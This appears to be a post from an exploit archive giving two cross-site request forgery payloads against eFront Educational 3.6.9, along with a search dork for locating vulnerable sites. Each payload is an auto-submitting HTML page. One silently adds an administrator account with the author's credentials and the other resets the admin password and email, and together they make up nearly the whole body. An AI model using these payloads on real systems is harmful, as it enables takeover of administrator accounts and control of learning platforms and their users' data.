=================================================================================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > < | |_> > |_( <_> ) || | /_____/ | / /_/ |
\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/
Exploit-ID is the Indonesian Exploit Archive
Web : exploit-id.com
e-mail : root[at]exploit-id.com
#########################################
I'm Caddy-Dz , member of exploit-id.com
#########################################
================================================================================
####
# Exploit Title: eFront Educational <=XSRF (Add admin/change admin passwd)
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com | Caddy-Dz@exploit-id.com
# Category:: webapps
# Google Dork: intext:"Educational Edition" inurl:/www/index.php
# Vendor: http://www.efrontlearning.net/
# Version: 3.6.9
# Tested on: [Windows Vista Edition Intégrale]
####
[*] #01# Add Admin: ~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<head>
<title>Algerians Hackers</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
var count = 1;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<form action="http://127.0.0.1/educational/www/administrator.php?ctg=personal&user=admin&op=profile&add_user=1" method="post" name="user_form" id="user_form" enctype="multipart/form-data" onsubmit="try { var myValidator = validate_user_form; } catch(e) { return true; } return myValidator(this);">
<input name="_qf__user_form" type="hidden" value="" /><input name="MAX_FILE_SIZE" type="hidden" value="8388608" />
<table class = "formElements">
<input type="hidden" name="login" / value="caddy-dz">
<input type="hidden" name="password_" / value="caddy-dz">
<input type="hidden" name="passrepeat" / value="caddy-dz">
<input type="hidden" name="name" / value="islam">
<input type="hidden" name="surname" / value="cadi">
<input type="hidden" name="email" / value="caddy-dz@exploit-id.com">
<input type="hidden" name="active" value="0" /><input class="inputCheckbox" id="activeCheckbox" name="active" type="checkbox" value="1" checked="checked" /></td></tr>
<td class = "elementCell"><select name="user_type">
<option value="student">student</option>
<option value="professor">Professor</option>
<option value="administrator" selected="selected">Administrator</option>
</form>
[*] #02# Change Admin Password:~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<head>
<title>Algerians Hackers</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
var count = 1;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<form method="post" name="user_form" action="http://127.0.0.1/educational/www/administrator.php?ctg=personal&user=admin&op=profile" id="user_form" enctype="multipart/form-data" onsubmit="try { var myValidator = validate_user_form; } catch(e) { return true; } return myValidator(this);">
<input name="_qf__user_form" type="hidden" value="" /><input name="MAX_FILE_SIZE" type="hidden" value="8388608" />
<table class = "formElements">
<input type="hidden" name="login" value="admin" />
<input type="hidden" name="password_" / value="caddy-dz">
<input type="hidden" name="passrepeat" / value="caddy-dz">
<input type="hidden" name="name" value="System" />
<input type="hidden" name="surname" value="Administrator" />
<input type="hidden" name="email" value="caddy-dz@exploit-id.com" />
</form>
</body>
</html>
####
Peace From Algeria
####
=================================**Algerians Hackers**=======================================
# Greets To :
KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team , Kalashinkov3 ,
(exploit-id.com) , (1337day.com) , (09exploit.com) , All My Friends: T!riRou , ChoK0 , MeRdaw! ,
CaRras0 , StiffLer , MaaTar , St0fa , Nissou , RmZ ...others
============================================================================================
